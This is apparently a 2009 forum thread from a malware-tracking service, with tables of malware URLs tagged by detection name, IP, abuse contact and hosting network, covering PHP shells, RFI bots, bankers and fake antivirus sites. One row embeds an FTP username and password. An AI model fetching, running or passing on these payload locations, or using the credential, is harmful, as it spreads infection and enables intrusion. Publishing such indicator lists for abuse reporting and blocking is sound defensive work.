| 2009-06-30 14:01:50  | avira      | TR/Dldr.Agent.yhp                                         | 217.76.156.92   | abuse@tpnet.pl               | PL      | RIPE   | NET-PIENSASOLUTIONS-2       | http://sapacontenedores.com/get_flash_update.exe                                                                                                                                                 |
| 2009-06-30 14:01:50  | undef      | unknown_exe                                               | 70.38.54.20     | abuse@noc.privatedns.com     | CA      | ARIN   | IWEB-BLK-05                 | http://spyremover.com/downloads/SpyRemoverSetup.exe                                                                                                                                              |
| 2009-06-30 14:01:50  | avira      | TR/Crypt.ZPACK.Gen                                        | 62.149.174.149  | hostmaster@technorail.com    | IT      | RIPE   | TECHNORAIL-NET              | http://www.artistinove.it/shok_video.exe                                                                                                                                                         |
| 2009-06-30 14:01:50  | avira      | TR/Crypt.ZPACK.Gen                                        | 61.139.126.14   | anti-spam@ns.chinanet.cn.net | CN      | APNIC  | CHINANET-SC                 | http://www.nicovedeo.com/watch/ma.exe                                                                                                                                                            |
| 2009-06-30 14:01:50  | avira      | DR/KeyLog.32                                              | 208.113.150.124 | abuse@dreamhost.com          | US      | ARIN   | DREAMHOST-BLK6              | http://www.palsol.com/downloads/v3/Setup_CSS_Shareware.exe                                                                                                                                       |
| 2009-06-30 14:01:50  | avira      | DR/KeyLog.32.1                                            | 208.113.150.124 | abuse@dreamhost.com          | US      | ARIN   | DREAMHOST-BLK6              | http://www.palsol.com/downloads/v3/Setup_PCS_Shareware.exe                                                                                                                                       |
| 2009-06-30 14:01:50  | avira      | ADSPY/Softomat.E.10                                       | 64.111.196.124  | abuse@isprime.com            | US      | ARIN   | ISPRIME-ARIN-2              | http://www.peakclick.com/toolbar/1/toolbar.exe                                                                                                                                                   |
| 2009-06-30 14:01:50  | undef      | unknown_exe                                               | 64.208.226.93   | abuse@gblx.net               | US      | ARIN   | GBLX-11A                    | http://www.privacy-care.com/bin/SpywareExpertInstall.exe                                                                                                                                         |
| 2009-06-30 14:01:49  | avira      | TR/Dldr.Fake.CGAV                                         | 76.76.103.164   | abuse@existhosting.com       | CA      | ARIN   | INTERWEB-MEDIA              | http://guardlab2009.biz//InstallerWF.exe                                                                                                                                                         |
| 2009-06-30 14:01:49  | avira      | TR/Dldr.Fake.CGAV                                         | 76.76.103.164   | abuse@existhosting.com       | CA      | ARIN   | INTERWEB-MEDIA              | http://guardlab2009.net//InstallerWF.exe                                                                                                                                                         |
| 2009-06-30 14:01:49  | avira      | TR/Crypt.ZPACK.Gen                                        | 65.61.216.163   | abuse@in2net.com             | CA      | ARIN   | IN2NETWORK                  | http://healthylifehypnotherapy.com/flashcodecinstall_13_31.exe                                                                                                                                   |
| 2009-06-30 14:01:49  | avira      | ADSPY/DiscoveryLive.A                                     | 64.22.66.202    | abuse@gnax.net               | US      | ARIN   | GNAXNET                     | http://mdl.stuffplug.com/MDL_1.3.0300.exe                                                                                                                                                        |
| 2009-06-30 14:01:49  | undef      | unknown_$INSTDIR/DivxPlayer.exe                           | 207.218.211.242 | abuse@ev1servers.net         | US      | ARIN   | EVRY-BLK-1                  | http://divx-player.ivefound.com/./download/DivxPlayerSetup.exe                                                                                                                                   |
| 2009-06-30 14:01:49  | undef      | unknown_$SHELc[17]/360safe/Shield/Install/360sandbox.exe | 60.170.241.23   | wanglinlin2@anhuitelecom.com | CN      | APNIC  | CHINANET-AH                 | http://down.360safe.com/se/360se_1.3.exe                                                                                                                                                         |
| 2009-06-30 14:01:49  | undef      | unknown_exe                                               | 221.203.179.20  | abuse@online.ln.cn           | CN      | APNIC  | CNCGROUP-LN                 | http://down.sandai.net/Thunder5.8.7.625.exe                                                                                                                                                      |
| 2009-06-24 02:55:18  | avira      | TR/ATRAPS.Gen                                             | 208.196.247.108 | NETQ@aitcom.net              | US      | ARIN   | UUNET1996B                  | http://208.196.247.108/awstats/classes/src/Telegrama-7614.scr                                                                                                                                    |
| 2009-06-23 23:55:13  | avira      | TR/Spy.Banker.ABPR                                        | 60.208.77.210   | abuse@cnc-noc.net            | CN      | APNIC  | CNCGROUP-SD                 | http://60.208.77.210/MOD/MODULO-ITAU.exe                                                                                                                                                         |
| 2009-06-06 04:55:08  | avira      | TR/Spy.Banker.ABOH                                        | 82.148.36.77    | abuse@fastnet.co.uk          | GB      | RIPE   | FN-ADSL-1678                | http://82.148.36.77/icons/BBModuloSeg.exe                                                                                                                                                        |
| 2009-05-25 17:55:09  | avira      | DR/FakeAV.MX                                              | 221.5.74.38     | abuse@cnc-noc.net            | CN      | APNIC  | CNCGROUP-GD                 | http://dl.guarddog2009.com/av.exe                                                                                                                                                                |
+----------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
54 rows in set (0.00 sec)
Title: Re: daily something......
Post by: cleanmx on July 21, 2009, 12:45:42 pm
another bunch of malwarlinks since 19th of Jul 2009

Code: [Select]
+----------------------+---------+-----------------------+-----------------+----------------------------------+---------+--------+----------------------------+---------------------------------------------------------------------------------+
| from_unixtime(first) | scanner | virusname             | review          | email                            | country | source | netname                    | url                                                                             |
+----------------------+---------+-----------------------+-----------------+----------------------------------+---------+--------+----------------------------+---------------------------------------------------------------------------------+
| 2009-07-21 13:02:15  | avira   | BDS/PHP.Small.O.12    | 89.108.90.204   | abuse@agava.com                  | RU      | RIPE   | AGAVACOMPANY               | http://www.mosautores.ru/smiles/ec.txt                                          |
| 2009-07-21 12:53:17  | avira   | PHP/BackDoor.AR       | 208.109.181.40  | abuse@godaddy.com                | US      | ARIN   | GO-DADDY-SOFTWARE-INC      | http://www.hydromatrixdesigns.com/copyright.txt                                 |
| 2009-07-21 12:52:59  | avira   | PHP/Pbot.A.6          | 165.141.177.14  | no-email-erx@apnic.net           | KR      | APNIC  | KUMHONET                   | http://www.dwsub301.co.kr/load                                                  |
| 2009-07-21 12:40:31  | undef   | unknown_html_RFI_php  | 78.129.205.94   | abuse_rs@altervista.it           | IT      | RIPE   | AlterVista_1               | http://roxe.altervista.org/id1.txt                                              |
| 2009-07-21 12:28:50  | undef   | unknown_html_RFI_php  | 208.109.181.40  | abuse@godaddy.com                | US      | ARIN   | GO-DADDY-SOFTWARE-INC      | http://www.hydromatrixdesigns.com/license.txt                                   |
| 2009-07-21 12:13:04  | avira   | BDS/PHP.Small.O.36    | 87.118.64.36    | vertrieb@aaa-webservice.de       | DE      | RIPE   | DE-KEYWEB-AAA              | http://www.goldstrategie.ch/images/icons/inv.png                                |
| 2009-07-21 11:51:59  | undef   | unknown_html_RFI_php  | 205.134.162.147 | nc@ai.net                        | US      | ARIN   | AINET-BLK                  | http://cebongbugil.justfree.com/sh/billing.txt                                  |
| 2009-07-21 11:38:10  | avira   | PHP/BackDoor.AR       | 93.188.245.224  | postmaster@t-wp.de               | DE      | RIPE   | TSES-ITO-CSS-RE-NO-HAM     | http://www.beru.com/deutsch/inc/pdf/.schulle/id2.txt                            |
| 2009-07-21 11:23:20  | undef   | unknown_html_RFI_php  | 205.134.162.147 | nc@ai.net                        | US      | ARIN   | AINET-BLK                  | http://cebongbugil.justfree.com/sh/id1.txt                                      |
| 2009-07-21 10:37:47  | undef   | unknown_html_RFI_php  | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://shefan.fileave.com/botbom.txt                                            |
| 2009-07-21 09:48:23  | undef   | unknown_html_RFI_php  | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://playboy88.fileave.com/cer88.txt                                          |
| 2009-07-21 09:48:02  | clamav  | PHP.Bot-6             | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://playboy88.fileave.com/ping.txt                                           |
| 2009-07-21 08:07:01  | undef   | unknown_html_RFI_php  | 70.85.33.242    | abuse@theplanet.com              | US      | ARIN   | NETBLK-THEPLANET-BLK-13    | http://cpi.cpi.co.za/includes/baner.txt                                         |
| 2009-07-21 07:24:40  | avira   | PHP/Pbot.A.6          | 75.126.192.185  | abuse@softlayer.com              | US      | ARIN   | SOFTLAYER-NETBLOCK4        | http://hayxonz.free-site-host.com/fragnet.txt                                   |
| 2009-07-21 07:20:49  | avira   | PHP/Zapchast.C        | 89.108.90.204   | abuse@agava.com                  | RU      | RIPE   | AGAVACOMPANY               | http://www.mosautores.ru/smiles/r0x.txt                                         |
| 2009-07-21 06:52:06  | undef   | unknown_html_RFI_php  | 89.17.220.221   | luis@miarroba.net                | ES      | RIPE   | MIARROBA-NET               | http://byeisenheim.webcindario.com/tools/Teste.txt                              |
| 2009-07-21 05:56:47  | clamav  | Trojan.Agent-118946   | 91.214.45.73    | abuse@altushost.com              | BZ      | RIPE   | ALTUSHOST-NET              | http://bigdron.com/download/6c715a5261673d3d173590f820090701/mediaplayer.exe    |
| 2009-07-21 05:56:46  | avira   | BDS/Agent.1260.A      | 194.85.240.210  | timur@ksu.ras.ru                 | RU      | RIPE   | KC-NET                     | http://194.85.240.210/pup//config/card.exe                                      |
| 2009-07-21 05:20:17  | undef   | unknown_html_RFI_php  | 93.188.245.224  | postmaster@t-wp.de               | DE      | RIPE   | TSES-ITO-CSS-RE-NO-HAM     | http://www.beru.com/deutsch/inc/pdf/.schulle/id1.txt                            |
| 2009-07-21 04:46:02  | avira   | BDS/PHP.ali.13        | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://mh4yh4.fileave.com/id.txt                                                |
| 2009-07-21 04:42:58  | clamav  | PHP.Bot-1             | 140.174.96.41   | abuse@ntt.net                    | US      | ARIN   | NTTA-140-174               | http://thaibestholiday.com/pic_home/bot.txt                                     |
| 2009-07-21 04:41:36  | clamav  | PHP.Defacer           | 74.220.215.70   | abuse@bluehost.com               | US      | ARIN   | BLUEHOST-NETWORK-2         | http://facxt.com/tool20/tool20.dat                                              |
| 2009-07-21 04:35:36  | undef   | unknown_html_RFI_php  | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://mh4yh4.fileave.com/copyright.txt                                         |
| 2009-07-21 04:12:56  | undef   | unknown_html_RFI_php  | 200.58.114.12   | marketing@DATTATEC.COM           | AR      | LACNIC | AR-DATT-LACNIC             | http://www.futbol-local.com/joom/pwn/fx29id.txt                                 |
| 2009-07-21 03:17:43  | clamav  | PHP.Shell-22          | 70.35.16.97     | abuse@netfirms.com               | CA      | ARIN   | NET-NF-00                  | http://cornect.com/vnc/fx29sh.txt                                               |
| 2009-07-21 03:15:30  | avira   | BDS/PHP.ali.9         | 202.29.24.15    | unnop@uni.net.th                 | TH      | APNIC  | THAINET-TH                 | http://www.snru.ac.th/kmc/gefel.txt                                             |
| 2009-07-21 02:56:42  | avira   | TR/Crypt.XPACK.Gen    | 89.149.254.174  | info@netdirekt.de                | DE      | RIPE   | NETDIRECT-NET              | http://scanme-now.com/s/w040259596dj72g74s/setup.exe                            |
| 2009-07-21 02:18:20  | avira   | PHP/Agent.G           | 123.141.123.141 | abuse@bora.net                   | KR      | APNIC  | BORANET                    | http://www.ozin.co.kr/data/oil2.txt                                             |
| 2009-07-21 01:40:10  | avira   | PHP/BackDoor.AR       | 62.149.140.94   | hostmaster@technorail.com        | IT      | RIPE   | TECHNORAIL-NET             | http://www.racingbikesrl.com/modules/fx29id2.txt                                |
| 2009-07-21 01:20:24  | avira   | PHP/BackDoor.AR       | 70.35.16.97     | abuse@netfirms.com               | CA      | ARIN   | NET-NF-00                  | http://cornect.com/vnc/fx29id2.txt                                              |
| 2009-07-21 01:16:10  | undef   | unknown_html_RFI_php  | 70.35.16.97     | abuse@netfirms.com               | CA      | ARIN   | NET-NF-00                  | http://cornect.com/vnc/fx29id.txt                                               |
| 2009-07-21 00:49:49  | undef   | unknown_html_RFI      | 204.2.183.50    | abuse@ntt.net                    | US      | ARIN   | NTTA-204                   | http://edbotflv.webs.com/fx29id.txt                                             |
| 2009-07-21 00:48:47  | undef   | unknown_html_RFI_php  | 70.35.16.97     | abuse@netfirms.com               | CA      | ARIN   | NET-NF-00                  | http://cornect.com/vnc/spread.txt                                               |
| 2009-07-21 00:33:32  | clamav  | PHP.Downloader        | 70.35.16.97     | abuse@netfirms.com               | CA      | ARIN   | NET-NF-00                  | http://cornect.com/vnc/spreadromenia.txt                                        |
| 2009-07-21 00:32:25  | avira   | PHP/BackDoor.AR       | 208.86.185.139  | abuse@hostican.com               | US      | ARIN   | HOSTICAN-NETWORK           | http://www.bodytweaking.com/wp-content/id2.txt                                  |
| 2009-07-21 00:32:21  | undef   | unknown_html_RFI_php  | 208.86.185.139  | abuse@hostican.com               | US      | ARIN   | HOSTICAN-NETWORK           | http://www.bodytweaking.com/wp-content/id1.txt                                  |
| 2009-07-20 23:02:56  | undef   | unknown_html_RFI_php  | 82.204.219.218  | noc@pochta.ru                    | RU      | RIPE   | POCHTA_RU-NET              | http://fotos.traicao0.smtp.ru/flashcard/cmdscan.txt                             |
| 2009-07-20 22:37:20  | clamav  | PHP.Remoteadmin-2     | 205.134.252.112 | abuse@corporatecolo.com          | US      | ARIN   | CORPCOLO-NET               | http://bruntil.com/cgi/hit                                                      |
| 2009-07-20 22:31:02  | clamav  | PHP.Shell-23          | 130.111.220.248 | abuse@maine.edu                  | US      | ARIN   | UMAINE-SYS                 | http://sato.asap.um.maine.edu//mcs/Library/key/test.txt                         |
| 2009-07-20 22:22:30  | undef   | unknown_html_RFI_php  | 98.137.46.72    | network-abuse@cc.yahoo-inc.com   | US      | ARIN   | A-YAHOO-US9                | http://www.geocities.com/djerink_anyib/BaruLagi/Botping.txt                     |
| 2009-07-20 21:54:47  | undef   | unknown_html_RFI_php  | 200.98.196.94   | l-registrobr-uol@corp.uol.com.br | BR      | LACNIC | 001.109.184/0001-95        | http://www.msgwebmailcontrol.com/send/gostoso.jpg                               |
| 2009-07-20 21:31:03  | avira   | PHP/Zapchast.C        | 80.93.54.78     | abuse@peterhost.ru               | RU      | RIPE   | PETERHOST-PITER            | http://mnogo-piva.ru/catalog/id.txt                                             |
| 2009-07-20 21:30:01  | undef   | unknown_html_RFI      | 205.178.145.65  | mark.salerno@inquent.com         | CA      | ARIN   | INQUENT-2                  | http://www.new-cairo.com//idste.txt                                             |
| 2009-07-20 21:18:35  | clamav  | PHP.Id                | 206.41.118.5    | abuse@risingnet.net              | US      | ARIN   | RISINGNET-IP1              | http://www.ciuz-shells.net/joomjoom/media/r0x-id.txt                            |
| 2009-07-20 21:06:51  | avira   | PHP/C99Shell.C        | 64.91.254.83    | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB                  | http://baseirc.net/cmd                                                          |
| 2009-07-20 20:49:48  | avira   | BDS/PHP.ali.9         | 216.55.97.244   | parsi@simi.org.ir                | IR      | RIPE   | SMSV-BLK-1                 | http://www.zanteweb.gr/zante-forums-old/chat/inc/maillist//maillist/admin/thumb |
| 2009-07-20 20:48:28  | avira   | BDS/PHP.Small.O.12    | 80.93.54.78     | abuse@peterhost.ru               | RU      | RIPE   | PETERHOST-PITER            | http://mnogo-piva.ru/catalog/readme.txt                                         |
| 2009-07-20 20:38:49  | avira   | PHP/BackDoor.AR       | 71.18.198.1     | abuse@ecommerce.com              | US      | ARIN   | OPENTRANSFER-ECOMMERCE     | http://forum.vinamin.vn/fid.txt                                                 |
| 2009-07-20 19:41:25  | clamav  | PHP.Downloader        | 76.163.230.34   | abuse@ecommerce.com              | US      | ARIN   | ECOMMERCE-HOSTING          | http://solelyyoursgem.com/img/products/mar/pendant/images/bot/spread/spread.txt |
| 2009-07-20 19:41:15  | avira   | SPR/PHP.ID            | 76.163.230.34   | abuse@ecommerce.com              | US      | ARIN   | ECOMMERCE-HOSTING          | http://solelyyoursgem.com/img/products/mar/pendant/images/bot/racrew/id.txt     |
| 2009-07-20 19:36:26  | undef   | unknown_html_RFI_php  | 12.180.200.217  | scam@abuse-att.net               | US      | ARIN   | ATT                        | http://www.amembersignup.com/signup/MF.txt                                      |
| 2009-07-20 19:31:41  | clamav  | PHP.Bot-6             | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://iyunk.fileave.com/ping.txt                                               |
| 2009-07-20 19:29:19  | clamav  | PHP.Shell-8           | 204.2.183.50    | abuse@ntt.net                    | US      | ARIN   | NTTA-204                   | http://edbotflv.webs.com/fx29id2.txt                                            |
| 2009-07-20 18:58:02  | undef   | unknown_html_RFI_php  | 58.120.227.233  | abuse@hanaro.com                 | KR      | APNIC  | HANANET                    | http://www.junggosum.com/bbs/data/sports_2/idxx.txt                             |
| 2009-07-20 18:38:41  | undef   | unknown_html_RFI_php  | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://flamers.fileave.com/php.txt                                              |
| 2009-07-20 18:27:10  | undef   | unknown_html_RFI_php  | 84.247.200.146  | asr@qualitynet.net               | KW      | RIPE   | QNETSERVERFARM             | http://www.suiteinn.it/news/images/idxx.txt                                     |
| 2009-07-20 18:22:44  | clamav  | PHP.Id-14             | 91.205.125.20   | abuse@gigabase.com               | RU      | RIPE   | GIGABASE-NET               | http://box.dmon.com/id.txt                                                      |
| 2009-07-20 18:20:21  | avira   | PHP/BackDoor.E        | 217.149.62.1    | abuse@futuron.org                | FI      | RIPE   | WEBHOTELLI-SRV             | http://fctribe.com/data/copyright.txt                                           |
| 2009-07-20 17:59:47  | avira   | BDS/Agent.1260.A      | 212.67.202.65   | abuse@pipex.net                  | GB      | RIPE   | UK-PIPEX-HOSTED-SERVERS-12 | http://themusicnetwork.co.uk/l/special_greetings.exe                            |
| 2009-07-20 17:47:23  | avira   | PHP/Spam.5833         | 202.153.125.212 | support@pbase.net                | HK      | APNIC  | POWERBASE-HK               | http://www.datum.com.hk/database_script_16Jul09.txt                             |
| 2009-07-20 17:26:04  | avira   | SPR/PHP.ID            | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://camila69.fileave.com/id.txt                                              |
| 2009-07-20 17:19:56  | avira   | PHP/Small.C           | 207.126.164.194 | robert@skiplink.com              | US      | ARIN   | SKIPLINK                   | http://slam.magicshells.com/~hex/ribz.txt                                       |
| 2009-07-20 17:13:08  | avira   | PHP/C99Shell.B        | 96.31.76.130    | abuse@noc4hosts.com              | US      | ARIN   | NOC4HOSTS1                 | http://www.myshellcode.com/c100.txt                                             |
| 2009-07-20 16:46:49  | undef   | unknown_html_RFI_php  | 69.64.76.172    | abuse@aplus.net                  | US      | ARIN   | ABAC2006A                  | http://www.ohmyflash.com/uiu.txt                                                |
| 2009-07-20 16:20:36  | undef   | unknown_html_RFI_php  | 62.149.140.94   | hostmaster@technorail.com        | IT      | RIPE   | TECHNORAIL-NET             | http://www.z-wave-europe.org/x                                                  |
| 2009-07-20 15:47:09  | avira   | SPR/PHP.ID            | 200.160.204.195 | eduardop@durand.com.br           | BR      | LACNIC | 059.278.085/0001-17        | http://www.afmarcenaria.com.br/templates/hotel/css/idd.txt                      |
| 2009-07-20 15:41:15  | avira   | PHP/Rst.F             | 84.246.225.186  | elbaze@elb.fr                    | FR      | RIPE   | BOULAHBEL                  | http://www.latitude-voile.com/latitude/images/r57                               |
| 2009-07-20 15:29:31  | avira   | SPR/PHP.ID            | 91.197.130.18   | info@data-xata.com               | UA      | RIPE   | DATAXATA-NET               | http://plengeh.wen.ru/id.txt                                                    |
| 2009-07-20 14:59:59  | avira   | SPR/PHP.ID            | 61.63.3.40      | hostmaster@twnic.net.tw          | TW      | APNIC  | TWNIC-TW                   | http://www.emc2watches.com//UserFiles/ivid.txt                                  |
| 2009-07-20 14:54:04  | clamav  | PHP.Id-3              | 216.120.231.11  | john@hostrocket.com              | US      | ARIN   | HRWEBSERVICES              | http://anotherannarbor.org/izrpx/os.txt                                         |
| 2009-07-20 14:48:56  | undef   | unknown_html_RFI_perl | 66.40.52.72     | dhswip@peer1.com                 | US      | ARIN   | MAXIM-4                    | http://Xiz.freehostia.com/MF.txt                                                |
| 2009-07-20 13:51:41  | undef   | unknown_exe           | 202.154.57.35   | fax: +98 21 882662               | IR      | RIPE   | RADNET-NOC-SBY-ID          | http://www.eforel.com/templates/ja_drimia/scripts/ja.script.js                  |
| 2009-07-20 12:40:48  | avira   | SPR/PHP.ID            | 74.54.97.18     | abuse@theplanet.com              | US      | ARIN   | NETBLK-THEPLANET-BLK-14    | http://www.fmi.edu.br/one/idd.txt                                               |
| 2009-07-20 12:30:51  | clamav  | PHP.Id-2              | 74.53.28.130    | abuse@theplanet.com              | US      | ARIN   | NETBLK-THEPLANET-BLK-14    | ftp://hollysoc:50283940@74.53.28.130/public_html/v6id.txt                       |
| 2009-07-20 12:17:37  | avira   | BDS/PHP.Small.O.12    | 221.143.40.37   | abuse@hanaro.com                 | KR      | APNIC  | HANANET                    | http://www.waawaa.com//Partner/order/readme.txt                                 |
| 2009-07-20 10:14:53  | undef   | unknown_html          | 69.50.192.70    | sales@atjeu.com                  | US      | ARIN   | ATJEU                      | http://pcsecurity09.com/                                                        |
| 2009-07-20 10:14:53  | undef   | unknown_html          | 72.52.210.133   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://pcsecurity-09.com/                                                       |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.131   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://homeav2010.com/                                                          |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.132   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://home-anti-virus-2010.com/                                                |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.131   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://homeantivirus2010.com/                                                   |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.132   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://home-antivirus2010.com/                                                  |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.130   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://homeanti-virus-2010.com/                                                 |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.131   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://home-anti-virus2010.com/                                                 |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.130   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://homeanti-virus2010.com/                                                  |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.133   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://homeantivirus-2010.com/                                                  |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.132   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://pc-security09.com/                                                       |
| 2009-07-20 10:14:51  | avira   | TR/Dropper.Gen        | 205.151.16.209  | noc@infoteck.qc.ca               | CA      | ARIN   | IFK-205-151-16-0           | http://205.151.16.209/~susan/E-Greetings.exe                                    |
| 2009-07-20 10:14:51  | undef   | unknown_html          | 72.52.210.130   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://home-av-2010.com/                                                        |
| 2009-07-20 10:14:51  | undef   | unknown_html          | 72.52.210.132   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://home-av2010.com/                                                         |
| 2009-07-20 10:05:17  | avira   | PHP/BackDoor.AR       | 68.178.211.6    | abuse@godaddy.com                | US      | ARIN   | GO-DADDY-SOFTWARE-INC      | http://www.firearts.org/events/ws/_b                                            |
| 2009-07-20 09:52:01  | undef   | unknown_html_RFI_php  | 68.178.211.6    | abuse@godaddy.com                | US      | ARIN   | GO-DADDY-SOFTWARE-INC      | http://www.firearts.org/events/ws/xxx                                           |
| 2009-07-20 09:51:54  | undef   | unknown_html_RFI_php  | 68.178.211.6    | abuse@godaddy.com                | US      | ARIN   | GO-DADDY-SOFTWARE-INC      | http://www.firearts.org/events/ws/_a                                            |
| 2009-07-20 09:25:17  | avira   | SPR/PHP.ID            | 200.108.36.132  | operaciones@MOVISTAR.COM.PA      | PA      | LACNIC | PA-BPBS-LACNIC             | http://ciudad.latinol.com/susan09/id.txt                                        |
| 2009-07-20 08:44:51  | avira   | PHP/Small.C           | 94.40.18.13     | marek.czyzowicz@petrosoft.pl     | PL      | RIPE   | PL-PETROSOFT               | http://www.sks75.rj.pl/media/spread.txt                                         |
| 2009-07-20 08:37:25  | clamav  | PHP.Id                | 221.143.46.104  | abuse@hanaro.com                 | KR      | APNIC  | HANANET                    | http://impeel.com/impeel/wizard/roxx_jpg.txt                                    |
| 2009-07-20 08:13:52  | avira   | PHP/C99Shell.A        | 85.214.69.190   | abuse@strato.de                  | DE      | RIPE   | STRATO-RZG-DED2            | http://wikiheaven.de/wikiheaven/templates/special.txt                           |
| 2009-07-20 08:13:40  | clamav  | PHP.Downloader        | 85.214.69.190   | abuse@strato.de                  | DE      | RIPE   | STRATO-RZG-DED2            | http://wikiheaven.de/wikiheaven/templates/yes.txt                               |
| 2009-07-20 08:13:28  | avira   | SPR/PHP.ID            | 85.214.69.190   | abuse@strato.de                  | DE      | RIPE   | STRATO-RZG-DED2            | http://wikiheaven.de/wikiheaven/templates/id.txt                                |
| 2009-07-20 07:52:56  | undef   | unknown_html_RFI_php  | 202.59.152.102  | hm-changed@apnic.net             | HK      | APNIC  | NET-FNCL                   | http://hongfuqitian.com/m1.gif                                                  |
| 2009-07-20 07:25:45  | undef   | unknown_html_RFI_php  | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://bangsat6.fileave.com/id.txt                                              |
| 2009-07-20 07:19:00  | avira   | PHP/IrcBot.F          | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://kontil.fileave.com/bot2.txt                                              |
| 2009-07-20 06:57:00  | undef   | unknown_html_RFI_php  | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://hampod.fileave.com/wet.txt                                               |
| 2009-07-20 03:57:29  | clamav  | PHP.Shell-22          | 68.142.212.71   | network-abuse@cc.yahoo-inc.com   | US      | ARIN   | INKTOMI-BLK-4              | http://www.coslcms.org/public/calendar//tools/safe.txt                          |
| 2009-07-20 02:15:06  | avira   | PHP/BackDoor.AR       | 66.40.52.72     | dhswip@peer1.com                 | US      | ARIN   | MAXIM-4                    | http://Xiz.freehostia.com/fx29id2.txt                                           |
| 2009-07-20 01:51:06  | clamav  | PHP.Id-2              | 211.202.2.220   | abuse@hanaro.com                 | KR      | APNIC  | HANANET                    | http://dwno.or.kr/bbs/zipcode/v6.txt                                            |
| 2009-07-20 00:39:04  | avira   | EXP/PHP.E             | 72.5.169.70     | abuse@internap.com               | US      | ARIN   | PNAP-09-2004               | http://eqz.zapto.org/aod.gif                                                    |
| 2009-07-19 22:27:51  | avira   | PHP/BackDoor.AR       | 94.40.18.13     | marek.czyzowicz@petrosoft.pl     | PL      | RIPE   | PL-PETROSOFT               | http://www.sks75.rj.pl/media/php.txt                                            |
| 2009-07-19 21:59:55  | avira   | PHP/BackDoor.AR       | 66.90.104.9     | abuse@fdcservers.net             | US      | ARIN   | FDCSERVERS                 | http://haxor-vendetta.com/id2.txt                                               |
| 2009-07-19 21:41:18  | clamav  | PHP.Shell-22          | 207.126.164.215 | robert@skiplink.com              | US      | ARIN   | SKIPLINK                   | http://www.magicshells.com/~hex/zenica.txt                                      |
| 2009-07-19 21:33:33  | clamav  | PHP.ShellExec         | 98.137.46.72    | network-abuse@cc.yahoo-inc.com   | US      | ARIN   | A-YAHOO-US9                | http://www.geocities.com/robbys.caem/whois.txt                                  |
| 2009-07-19 21:32:45  | avira   | PHP/Pbot.A.6          | 66.102.100.85   | dangelo@anet.com                 | US      | ARIN   | ANET-BLK-06                | http://www.diversityworking.com/career/o.txt                                    |
| 2009-07-19 21:23:58  | clamav  | PHP.Shell             | 87.106.54.234   | abuse@schlund.de                 | DE      | RIPE   | SCHLUND-CUSTOMERS          | http://geschenkpuzzle.de/logs/session/locus.txt                                 |
| 2009-07-19 20:57:04  | avira   | TR/PHPShell.U         | 210.220.213.203 | abuse@hanaro.com                 | KR      | APNIC  | KRNIC-KR                   | http://www.solmae.co.kr///receipt/lib/_private/sh.txt                           |
| 2009-07-19 20:37:33  | clamav  | PHP.Downloader-4      | 210.220.213.203 | abuse@hanaro.com                 | KR      | APNIC  | KRNIC-KR                   | http://www.solmae.co.kr///receipt/lib/_private/scan/spread.txt                  |
| 2009-07-19 20:37:18  | avira   | PHP/Agent.G           | 210.220.213.203 | abuse@hanaro.com                 | KR      | APNIC  | KRNIC-KR                   | http://www.solmae.co.kr///receipt/lib/_private/scan/id.txt                      |
| 2009-07-19 20:10:29  | avira   | PHP/Small.C           | 64.185.237.80   | Domains@cbcast.net               | US      | ARIN   | CBCAST                     | http://www.pupapa.com/zero/tmp/read.txt                                         |
| 2009-07-19 19:47:34  | undef   | unknown_html_RFI_php  | 218.5.74.92     | fjnic@fjdcb.fz.fj.cn             | CN      | APNIC  | CHINANET-FJ                | http://www.yw365.com/images/cache/ml.txt                                        |
| 2009-07-19 19:40:17  | clamav  | PHP.Remoteadmin-3     | 203.26.41.138   | vic@cia.com.au                   | AU      | APNIC  | CIA-AU                     | http://mpva.com.au/x                                                            |
| 2009-07-19 19:38:01  | avira   | PHP/BackDoor.AR       | 200.98.196.94   | l-registrobr-uol@corp.uol.com.br | BR      | LACNIC | 001.109.184/0001-95        | http://www.msgwebmailcontrol.com/botp/id2.txt                                   |
| 2009-07-19 19:37:40  | undef   | unknown_html_RFI_php  | 200.98.196.94   | l-registrobr-uol@corp.uol.com.br | BR      | LACNIC | 001.109.184/0001-95        | http://www.msgwebmailcontrol.com/botp/id1.txt                                   |
